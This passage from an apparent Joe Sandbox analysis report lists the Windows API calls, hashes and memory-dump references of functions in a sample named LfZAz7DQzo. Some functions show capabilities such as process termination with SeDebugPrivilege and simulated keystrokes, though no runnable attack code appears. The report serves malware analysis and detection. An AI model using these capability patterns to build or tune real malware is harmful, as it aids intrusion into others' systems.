                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E820D3
                                        • KillTimer.USER32(-00000001,?,?,?,?,00E816CB,00000000,?,?,00E81AE2,?,?), ref: 00E8216E
                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00EBBEF6
                                        • DeleteObject.GDI32(00000000), ref: 00EBBF6C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                        • String ID:
                                        • API String ID: 2402799130-0
                                        • Opcode ID: 06f5a44f93c4fe6e367aa1368a30ee1359b3f832795bc9a6c140f9c493f339e8
                                        • Instruction ID: 5f254e1f01d185b150094696bfb153aed2646903ae9ac48cd3387c63b2a3de51
                                        • Opcode Fuzzy Hash: 06f5a44f93c4fe6e367aa1368a30ee1359b3f832795bc9a6c140f9c493f339e8
                                        • Instruction Fuzzy Hash: 3761AF34200614DFDB35AF14DD48B7AB7F1FF52319F10652CE64AAA9A0C771A881EF51
                                        Function 00EE4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00EE48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EE38D3,?), ref: 00EE48C7
                                          • Part of subcall function 00EE48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00EE38D3,?), ref: 00EE48E0
                                          • Part of subcall function 00EE4CD3: GetFileAttributesW.KERNEL32(?,00EE3947), ref: 00EE4CD4
                                        • lstrcmpiW.KERNEL32(?,?), ref: 00EE4FE2
                                        • _wcscmp.LIBCMT ref: 00EE4FFC
                                        • MoveFileW.KERNEL32(?,?), ref: 00EE5017
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                        • String ID:
                                        • API String ID: 793581249-0
                                        • Opcode ID: 6787b6874abca86461c07841da32e8ae0dbe339a5e81d6956d047d2621079a13
                                        • Instruction ID: 13dee2f42e0769e3e259bbb5068b3fcb2a9259feb29fd3b4d304b41e6f50ab47
                                        • Opcode Fuzzy Hash: 6787b6874abca86461c07841da32e8ae0dbe339a5e81d6956d047d2621079a13
                                        • Instruction Fuzzy Hash: 865176B21087899BC724EB60C8819DFB3DCAF85344F10592EF289E7191EF74E588C766
                                        Function 00F088B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                        Download Yara Rule
                                        APIs
                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F0896E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: InvalidateRect
                                        • String ID:
                                        • API String ID: 634782764-0
                                        • Opcode ID: 4c1af0de1e838034b5b2311191a6802fcd9bd7e5d1fcc4084a1f73a1b03d24f8
                                        • Instruction ID: f8e39bd9db083cd8f2d03b73e4e05505a11673125ca9f5757fe6ae628859adce
                                        • Opcode Fuzzy Hash: 4c1af0de1e838034b5b2311191a6802fcd9bd7e5d1fcc4084a1f73a1b03d24f8
                                        • Instruction Fuzzy Hash: 3251D630A00308BFDF309F28CC85BA97BA4BB157A0F504116F995E65E1DF75A986BB41
                                        Function 00E82B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00EBC547
                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EBC569
                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00EBC581
                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00EBC59F
                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00EBC5C0
                                        • DestroyCursor.USER32(00000000), ref: 00EBC5CF
                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00EBC5EC
                                        • DestroyCursor.USER32(?), ref: 00EBC5FB
                                          • Part of subcall function 00F0A71E: DeleteObject.GDI32(00000000), ref: 00F0A757
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                                        • String ID:
                                        • API String ID: 2975913752-0
                                        • Opcode ID: f8f8dd18289de30ec3e06fd72bc1c89c41aa6c19fe51ffe3fc9af6ac72f91764
                                        • Instruction ID: 870ac3065db62c1536582af22642886a4ffbbf92c980eaf6177aeb8aed46ada8
                                        • Opcode Fuzzy Hash: f8f8dd18289de30ec3e06fd72bc1c89c41aa6c19fe51ffe3fc9af6ac72f91764
                                        • Instruction Fuzzy Hash: CB515974601209AFDB20EF24CC45FAA77E5FB59714F205528FA0AE76A0DB70ED90EB50
                                        Function 00ED9B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00EDAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EDAE77
                                          • Part of subcall function 00EDAE57: GetCurrentThreadId.KERNEL32 ref: 00EDAE7E
                                          • Part of subcall function 00EDAE57: AttachThreadInput.USER32(00000000,?,00ED9B65,?,00000001), ref: 00EDAE85
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ED9B70
                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00ED9B8D
                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00ED9B90
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ED9B99
                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00ED9BB7
                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ED9BBA
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ED9BC3
                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00ED9BDA
                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ED9BDD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                        • String ID:
                                        • API String ID: 2014098862-0
                                        • Opcode ID: d46a589e6eec8a54f6518219d0f34cd4df1b1968e9b648f50525a8d3a1aa0f02
                                        • Instruction ID: c68c8a4743550a4db294ec9ee14e2271e1c05b83d255eeeb2841a762a634268f
                                        • Opcode Fuzzy Hash: d46a589e6eec8a54f6518219d0f34cd4df1b1968e9b648f50525a8d3a1aa0f02
                                        • Instruction Fuzzy Hash: 7F114471510218BEF6202F20DC89FAA3F2CEB0C751F110426F644AB1A1CAF35C51EAA4
                                        Function 00ED8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00ED8A84,00000B00,?,?), ref: 00ED8E0C
                                        • RtlAllocateHeap.NTDLL(00000000,?,00ED8A84), ref: 00ED8E13
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00ED8A84,00000B00,?,?), ref: 00ED8E28
                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00ED8A84,00000B00,?,?), ref: 00ED8E30
                                        • DuplicateHandle.KERNEL32(00000000,?,00ED8A84,00000B00,?,?), ref: 00ED8E33
                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00ED8A84,00000B00,?,?), ref: 00ED8E43
                                        • GetCurrentProcess.KERNEL32(00ED8A84,00000000,?,00ED8A84,00000B00,?,?), ref: 00ED8E4B
                                        • DuplicateHandle.KERNEL32(00000000,?,00ED8A84,00000B00,?,?), ref: 00ED8E4E
                                        • CreateThread.KERNEL32(00000000,00000000,00ED8E74,00000000,00000000,00000000), ref: 00ED8E68
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                        • String ID:
                                        • API String ID: 1422014791-0
                                        • Opcode ID: 5f8751f5abf6ca0cdd07dae7ede4894ed197da01f0900537d109e060d47de526
                                        • Instruction ID: 4f24d50568265250e11f1c831c70a44361a57097509d268a5f0854322ed8e765
                                        • Opcode Fuzzy Hash: 5f8751f5abf6ca0cdd07dae7ede4894ed197da01f0900537d109e060d47de526
                                        • Instruction Fuzzy Hash: 6201A4B5240308FFE620ABA5DC49F6B3BACFB89711F004421FA05DB6A1CA7098049A20
                                        Function 00EF9A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00ED7652: CLSIDFromProgID.COMBASE ref: 00ED766F
                                          • Part of subcall function 00ED7652: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00ED768A
                                          • Part of subcall function 00ED7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00ED758C,80070057,?,?), ref: 00ED7698
                                          • Part of subcall function 00ED7652: CoTaskMemFree.COMBASE(00000000), ref: 00ED76A8
                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00EF9B1B
                                        • _memset.LIBCMT ref: 00EF9B28
                                        • _memset.LIBCMT ref: 00EF9C6B
                                        • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000000), ref: 00EF9C97
                                        • CoTaskMemFree.COMBASE(?), ref: 00EF9CA2
                                        Strings
                                        • NULL Pointer assignment, xrefs: 00EF9CF0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                        • String ID: NULL Pointer assignment
                                        • API String ID: 1300414916-2785691316
                                        • Opcode ID: 8e5821a209676a6510d5cec38f78a87a954bcbaa4ee046fe5b9dcb12f3d670ed
                                        • Instruction ID: 18a826a68197050101f52dde879417dc89d430ecae61646dcde0543d5f8ebf2b
                                        • Opcode Fuzzy Hash: 8e5821a209676a6510d5cec38f78a87a954bcbaa4ee046fe5b9dcb12f3d670ed
                                        • Instruction Fuzzy Hash: 0E913871D0021DABDB10DFA5DC84AEEBBB8AF08710F20515AF559B7281DB319A45CFA0
                                        Function 00EFEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00EE3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00EE3EB6
                                          • Part of subcall function 00EE3E91: Process32FirstW.KERNEL32(00000000,?), ref: 00EE3EC4
                                          • Part of subcall function 00EE3E91: CloseHandle.KERNEL32(00000000), ref: 00EE3F8E
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EFECB8
                                        • GetLastError.KERNEL32 ref: 00EFECCB
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EFECFA
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EFED77
                                        • GetLastError.KERNEL32(00000000), ref: 00EFED82
                                        • CloseHandle.KERNEL32(00000000), ref: 00EFEDB7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                        • String ID: SeDebugPrivilege
                                        • API String ID: 2533919879-2896544425
                                        • Opcode ID: 7aa78aab5e240e71f83c4269571631aa4fcd5f5ee8c0f7a521aa9b5ecaa88754
                                        • Instruction ID: df4deeed874a65b5c4c5d29a094734289ec4756dfe1e9b5b3a0265da059581f4
                                        • Opcode Fuzzy Hash: 7aa78aab5e240e71f83c4269571631aa4fcd5f5ee8c0f7a521aa9b5ecaa88754
                                        • Instruction Fuzzy Hash: DF41BD712002049FDB24EF24CC95F7EB7E1AF80714F189459FA46AB3D2DB75A805CB92
                                        Function 00EE3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadIconW.USER32(00000000,00007F03), ref: 00EE32C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: IconLoad
                                        • String ID: blank$info$question$stop$warning
                                        • API String ID: 2457776203-404129466
                                        • Opcode ID: 4b5d67796ac8dffed2866b531ded0c1b5b64f4496b00878360f770a1e8b1d85e
                                        • Instruction ID: e9c40a3c2435b96a2a9c19717544262a1bd4cc96831520e89aff55018be3a03e
                                        • Opcode Fuzzy Hash: 4b5d67796ac8dffed2866b531ded0c1b5b64f4496b00878360f770a1e8b1d85e
                                        • Instruction Fuzzy Hash: DB112B316093CEBAD7015A77DC46CABB3DCDF1D374F20102AFA40B7191D665EB4055A6
                                        Function 00EE4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00EE454E
                                        • LoadStringW.USER32(00000000), ref: 00EE4555
                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00EE456B
                                        • LoadStringW.USER32(00000000), ref: 00EE4572
                                        • _wprintf.LIBCMT ref: 00EE4598
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EE45B6
                                        Strings
                                        • %s (%d) : ==> %s: %s %s, xrefs: 00EE4593
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message_wprintf
                                        • String ID: %s (%d) : ==> %s: %s %s
                                        • API String ID: 3648134473-3128320259
                                        • Opcode ID: 6aa036a2f97a98e01e08f383e9b3eeb94e75e1d2523cf1847d57fefc6d027a10
                                        • Instruction ID: 3817c887d65899398ca6ceabd1fbd5e33c3f380249710500d72d49bbd2fd6f21
                                        • Opcode Fuzzy Hash: 6aa036a2f97a98e01e08f383e9b3eeb94e75e1d2523cf1847d57fefc6d027a10
                                        • Instruction Fuzzy Hash: A70162F290020CBFE720E7A0DD89EE7776CE708301F4005A5BB45E2051EA759E899B71
                                        Function 00E82A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                        Download Yara Rule
                                        APIs
                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EBC417,00000004,00000000,00000000,00000000), ref: 00E82ACF
                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00EBC417,00000004,00000000,00000000,00000000,000000FF), ref: 00E82B17
                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00EBC417,00000004,00000000,00000000,00000000), ref: 00EBC46A
                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EBC417,00000004,00000000,00000000,00000000), ref: 00EBC4D6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ShowWindow
                                        • String ID:
                                        • API String ID: 1268545403-0
                                        • Opcode ID: 12428009f0147b89f7847d5eb87fcbec29bf612e3e595e579b0ccb3beddff3f7
                                        • Instruction ID: f99618c648183ee913494fd7f6ab0db29e1d3ea2db9ac1d29c76f09bd6992b5b
                                        • Opcode Fuzzy Hash: 12428009f0147b89f7847d5eb87fcbec29bf612e3e595e579b0ccb3beddff3f7
                                        • Instruction Fuzzy Hash: F4416E34208680AEC73DAB28CC9C7FB7B92FF46308F24A45DE25FB6560C6359845E711
                                        Function 00EE7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00EE737F
                                          • Part of subcall function 00EA0FF6: std::exception::exception.LIBCMT ref: 00EA102C
                                          • Part of subcall function 00EA0FF6: __CxxThrowException@8.LIBCMT ref: 00EA1041
                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00EE73B6
                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00EE73D2
                                        • _memmove.LIBCMT ref: 00EE7420
                                        • _memmove.LIBCMT ref: 00EE743D
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00EE744C
                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00EE7461
                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EE7480
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                        • String ID:
                                        • API String ID: 256516436-0
                                        • Opcode ID: de9c6f39d636a05abd952740614ea8b1a9dbfb31dac55779798abefc9dee79fa
                                        • Instruction ID: 94f9bf6507f94a94ecfe879b00c76af07791c876b2f8915a9ee8a113e6cdd320
                                        • Opcode Fuzzy Hash: de9c6f39d636a05abd952740614ea8b1a9dbfb31dac55779798abefc9dee79fa
                                        • Instruction Fuzzy Hash: 7B316F35A04209EBCF10EF65DC85AAF7BB8FF49710F1441B5F904AB246DB70AA14DBA0
                                        Function 00F06442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 00F0645A
                                        • GetDC.USER32(00000000), ref: 00F06462
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F0646D
                                        • ReleaseDC.USER32(00000000,00000000), ref: 00F06479
                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F064B5
                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F064C6
